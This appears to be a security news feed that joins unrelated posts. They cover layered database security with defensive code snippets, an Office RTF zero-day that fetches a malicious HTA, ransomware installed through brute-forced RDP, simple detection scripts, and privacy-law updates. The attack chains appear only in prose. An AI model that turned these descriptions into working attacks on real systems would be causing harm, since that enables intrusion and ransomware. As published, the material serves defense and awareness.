We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on to say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented them. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when, in reality, it was a simple phishing attack in which credentials were handed over.

In one recent case, a third-party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind, each of which could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.
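
As a toy illustration of masking during export (not a sketch of any particular vendor's masking tool), the snippet below rewrites two hypothetical sensitive columns with fabricated values while copying rows out, so the file that leaves production never contains the real data. The file name and column names are assumptions.

```python
import csv
import random

def fake_ssn() -> str:
    """Generate a random, clearly fabricated SSN-shaped value."""
    return f"{random.randint(100, 899):03d}-{random.randint(1, 99):02d}-{random.randint(1, 9999):04d}"

def fake_email(i: int) -> str:
    return f"user{i}@example.com"

# Hypothetical export: real rows in, masked rows out.
with open("customers.csv", newline="") as src, \
     open("customers_masked.csv", "w", newline="") as dst:
    reader = csv.DictReader(src)
    writer = csv.DictWriter(dst, fieldnames=reader.fieldnames)
    writer.writeheader()
    for i, row in enumerate(reader):
        row["ssn"] = fake_ssn()      # hypothetical column names
        row["email"] = fake_email(i)
        writer.writerow(row)
```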

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Access Security Brokers (CASBs) can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.
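
The kind of automated configuration check described above can be quite small. Below is a minimal sketch, assuming the exposed storage was an S3 bucket with a public ACL; a CASB or a scheduled job could run something similar across every account and remediate on a hit. This version only reports, it does not fix anything, and it assumes AWS credentials are already configured for boto3.

```python
import boto3

# ACL grantee URIs that make a bucket readable by the world or by any AWS user.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

s3 = boto3.client("s3")
for bucket in s3.list_buckets()["Buckets"]:
    name = bucket["Name"]
    acl = s3.get_bucket_acl(Bucket=name)
    public_grants = [g for g in acl["Grants"]
                     if g.get("Grantee", {}).get("URI") in PUBLIC_GROUPS]
    if public_grants:
        print(f"WARNING: bucket {name} has {len(public_grants)} public grant(s)")
```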

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to mount an advanced cryptographic attack, which would take enormous resources and time and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of a lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the protection stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).
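
A minimal sketch of the two field-level protections described above, using the standard library's PBKDF2 for passwords and the third-party cryptography package's Fernet for SSNs. In a real deployment the encryption key would come from a KMS or HSM and the salt handling and iteration count would follow current guidance; the values here are only illustrative.

```python
import hashlib
import os
from cryptography.fernet import Fernet  # pip install cryptography

def hash_password(password: str) -> tuple:
    """Store only a salted, slow hash of the password -- never the plaintext."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest

# Application-tier encryption: the key lives with the application (or a KMS),
# so a copied database file or an over-privileged DB account sees only ciphertext.
ssn_key = Fernet.generate_key()   # illustrative only; fetch from a KMS in practice
fernet = Fernet(ssn_key)

ciphertext = fernet.encrypt(b"078-05-1120")    # hypothetical SSN
print(fernet.decrypt(ciphertext).decode())     # only code holding the key can decrypt
```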

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.). Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

Fight firewall sprawl with AlgoSec, Tufin, Skybox suites

New and innovative security tools seem to be emerging all the time, but the frontline defense for just about every network in operation today remains the trusty firewall. They aren’t perfect, but if configured correctly and working as intended, firewalls can do a solid job of blocking threats from entering a network, while restricting unauthorized traffic from leaving.

The problem network administrators face is that as their networks grow, so do the number of firewalls. Large enterprises can find themselves with hundreds or thousands of firewalls -- a mix of old, new and next-gen models, probably from multiple vendors -- sometimes accidentally working against each other. For admins trying to configure firewall rules, the task can quickly become unmanageable.

Acknowledgement of Attacks Leveraging Microsoft Zero-Day

FireEye recently detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating for several weeks on a public disclosure timed with the release of a patch by Microsoft to address the vulnerability. After recent public disclosure by another company, this blog serves to acknowledge FireEye’s awareness and coverage of these attacks.

FireEye email and network solutions detect the malicious documents as: Malware.Binary.Rtf.

Attack Scenario

The attack involves a threat actor emailing a Microsoft Word document with an embedded OLE2link object to a targeted user. When the user opens the document, winword.exe issues an HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
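
As a rough triage aid (not a substitute for the vendor detections mentioned above), one hedged heuristic is to flag RTF files whose object data contains the hex-encoded string "OLE2Link", an indicator commonly associated with these samples. The sketch below is deliberately naive: it will miss obfuscated variants and may flag benign files, so treat hits only as candidates for deeper analysis.

```python
import sys

# "OLE2Link" as it typically appears hex-encoded inside an RTF \objdata stream.
OLE2LINK_HEX = b"4f4c45324c696e6b"

def looks_suspicious(path: str) -> bool:
    with open(path, "rb") as f:
        data = f.read().lower()
    # Crude check: RTF-looking header plus the hex-encoded OLE2Link marker.
    return data.startswith(b"{\\rt") and OLE2LINK_HEX in data

for path in sys.argv[1:]:
    verdict = "possible OLE2Link object -- inspect further" if looks_suspicious(path) else "no OLE2Link marker"
    print(f"{path}: {verdict}")
```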

The exploit bypasses most mitigations; however, as noted above, FireEye email and network products detect the malicious documents. Microsoft Office users are advised to apply the patch as soon as it is available.

Acknowledgements

FLARE Team, FireEye Labs Team, FireEye iSIGHT Intelligence, and Microsoft Security Response Center (MSRC).

President Trump Nullifies FCC Broadband Consumer Privacy Rules

On April 3, 2017, President Trump signed a bill which nullifies the Broadband Consumer Privacy Rules (the “Rules”) promulgated by the FCC in October 2016. The Rules largely had not yet taken effect. In a statement, FCC Chairman Ajit Pai praised the elimination of the Rules, noting that, “in order to deliver that consistent and comprehensive protection, the Federal Communications Commission will be working with the Federal Trade Commission to restore the FTC’s authority to police Internet service providers’ privacy practices.”

A User-Friendly Interface for Cyber-criminals

IMG-MC-wysiwye

Installing malware through Remote Desktop Protocol (RDP) is a popular attack method used by many cyber-criminals. Over the past few months, Panda Security’s research facility, PandaLabs, has analysed several attacks of this nature.

Once credentials are obtained through a brute force attack on RDP, the cyber-criminals gain access to the company. The attackers then simply execute the corresponding malware to start the encryption.
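
Because the initial foothold here is RDP password guessing, one simple defensive check is to count failed logon events per source address. The sketch below assumes the Windows Security log has been exported to CSV with hypothetical column names; Event ID 4625 with logon type 10 corresponds to failed RemoteInteractive (RDP) logons, and the alert threshold is arbitrary.

```python
import csv
from collections import Counter

failures = Counter()
with open("security_log.csv", newline="") as f:   # hypothetical export of the Security event log
    for event in csv.DictReader(f):
        # 4625 = failed logon; logon type 10 = RemoteInteractive (RDP)
        if event["EventID"] == "4625" and event["LogonType"] == "10":
            failures[event["SourceIP"]] += 1

THRESHOLD = 50   # arbitrary for this sketch
for ip, count in failures.most_common():
    if count >= THRESHOLD:
        print(f"{ip}: {count} failed RDP logons -- possible brute force")
```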

wysiwye-530x483

Recently, however, PandaLabs has noticed more personalised attacks. Analysing this intrusion, we see that the ransomware comes with its own interface, through which it can be configured according to the attacker's preferences, starting with details such as which email address will appear in the ransom note. This customised approach makes it possible to hand-pick the devices the attackers want to target.

The advanced attacks we continue to see in this environment require businesses to employ a corporate network security strategy. Preventing zero-day attacks from entering your network is essential, as are efforts to neutralise and block attacks.

Data collected from Panda clients in Europe indicated that Panda Adaptive Defense 360 (AD360) was able to detect and block this particular attack. Timely investment in prevention, detection and response technology, such as AD360, provides better protection against these newer threats.

Israel Passes Comprehensive Data Security and Breach Notification Regulations

Haim Ravia and Dotan Hammer of Pearl Cohen Zedek Latzer Baratz recently published an article outlining Israel’s new Protection of Privacy Regulations (“Regulations”), passed by the Knesset on March 21, 2017. The Regulations will impose mandatory comprehensive data security and breach notification requirements on anyone who owns, manages or maintains a database containing personal data in Israel.

The Regulations will become effective in late March 2018.

Read Pearl Cohen’s full article.

Hack Naked News #118 – April 4, 2017

Doug White fills in in the studio, while the awesome, sheer naked power of Jason Wood fills the airwaves. Anonymous FTP, the Russians, Skynet activates in Connecticut, and the return of Van Eck Phreaking!

Full Show Notes: http://wiki.securityweekly.com/wiki/index.php/HNNEpisode118

Visit http://hacknaked.tv to get all the latest episodes!

Doing it wrong, or “us and them”

I was arguing with the wiring in a little RV over the weekend and it was the typical RV mix of automotive wiring, household wiring, and What The Expletive wiring. I fell back to my auto mechanic days and set about chasing the demons through the wires. Basic diagnostics: separate, isolate, test, reconnect, retest, repeat, until a path becomes clear. In this quest I used an old trick of mine (although I assume many others have used it) of using crimp connectors the “wrong” way. This made me think of being called out for it many years ago, “you’re doing it wrong you idiot!” or something like that. I tried to explain that I was just using the common butt connectors in a different way for a different situation, but he wouldn’t hear of it. “That’s not how you use them” was the answer.

This was long before my computer and hacker days, but the mindset is there in many car guys. “You’re not supposed to do that” is a warning to most, but an invitation to many of us.

I hate to say we can’t teach that, but with a lot of folks you either have that curiosity or you don’t. I do think a lot more folks have that kind of innate curiosity and desire to test boundaries, but sadly our modern education systems can’t handle those characteristics in kids. “Do it our way or you are wrong” is great for standardized testing, but terrible for education. And in our little world of cyberthings we really need curious people, people who ask questions like

Why?

Why not?

What if?

Hold my beer…

OK, the last wasn’t a question, but a statement of willingness to try.

I don’t have the answer, but I have seen a lot of little things which help: hackerspaces, makerspaces, good STEM/STEAM programs, and youth programs at hacker/security cons are great steps, but I fear that these only serve to minimize the damage done by the state of education in the US lately.

So yeah, I guess I’m just complaining. Again.

Oh, and about using the connectors wrong: normally you put one stripped end of a wire in each end of the connector and create an inline splice. For problem situations I connect the wires as shown in the image. This provides a good connection, arguably better than the inline method since the wires are directly touching. More importantly, the open ends of the connectors are shielded to prevent accidental contact, yet open to provide handy test points as you chase the demons through the wires. Which reminds me of another story, but that’s one for the barstool…

Wrong

Jack

Hunton Discusses Critical Cyber Coverage Selection Issues

In March 2017, Syed Ahmad, a partner with Hunton & Williams LLP’s insurance practice, and Eileen Garczynski, partner at insurance brokerage Ames & Gough, co-authored an article, Protecting Company Assets with Cyber Liability Insurance, in Mealey’s Data Privacy Law Report. The article describes why cyber liability insurance is necessary for companies and provides tips on how it can make a big difference. Ahmad and Garczynski discuss critical questions companies seeking to protect company assets through cyber insurance should be asking.

Read the full article.

Virginia Adds State Income Tax Provision to Data Breach Notification Law

Recently, Virginia passed an amendment to its data breach notification law that adds state income tax information to the types of data that require notification to the Virginia Office of the Attorney General in the event of unauthorized access and acquisition of such data. Under the amended law, an employer or payroll service provider must notify the Virginia Office of the Attorney General after the discovery or notification of unauthorized access and acquisition of unencrypted and unredacted computerized data containing a Virginia resident’s taxpayer identification number in combination with the income tax withheld for that taxpayer. 

The amendment contains a harm threshold, requiring notification when such unauthorized access and acquisition compromises the confidentiality of the data and causes, or reasonably will cause, identity theft or fraud. For employers, the amendment applies only to the employer’s Virginia employees, and not to information regarding the employer’s customers or non-employees. Notification to the Virginia Office of the Attorney General must be made “without unreasonable delay” and must include the name and federal employer identification number of the employer that may be affected by the incident. The amendment requires notification only to the Virginia Office of the Attorney General, and not affected individuals. The amendment takes effect on July 1, 2017.